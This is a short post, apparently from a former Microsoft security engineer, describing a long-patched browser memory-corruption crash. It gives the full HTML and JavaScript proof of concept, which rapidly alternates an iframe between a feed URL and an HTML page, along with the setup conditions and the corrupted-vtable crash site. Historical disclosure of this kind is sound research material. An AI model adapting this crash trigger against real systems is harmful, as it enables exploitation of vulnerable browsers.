This one took me by surprise. Rapidly alternating an iFrame between an RSS/Atom feed URL and a regular HTML page caused an exploitable crash after just a few iterations. The key insight was combining a “hard-set” navigation (direct location assignment) with a “soft-set” navigation (window.open targeting the iFrame name).
    <!-- Target frame; both navigations below are aimed at this name -->
    <iframe name="iFrame" width="300" height="50" border="1"></iframe>
    <input type="button" onclick="setInterval('main()', 100);" value="setInterval('main()', 100); // CrashMe!">
    <script language="JavaScript">
    function main()
    {
        // Toggle a global flag on every tick so the two navigations alternate.
        // The assignment inside the condition is intentional.
        if (flag = !window.flag)
            // "hard-set" navigation: direct location assignment to the feed URL
            iFrame.location = "feeds.xml";
        else
            // "soft-set" navigation: window.open targeting the iframe by name
            window.open("dummy.html", "iFrame");
    }
    </script>
An important detail: the XML file needs to be a valid feed document, and the HTML file must contain an alert with an object inside. The alert itself never actually fires, but its presence inside the feed-rendered object is what triggers the problematic code path. The crash lands in OLEAUT32!VariantClear while clearing a vtable pointer that has been corrupted by the feed/HTML context switch; !msec.exploitable rated it EXPLOITABLE.
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.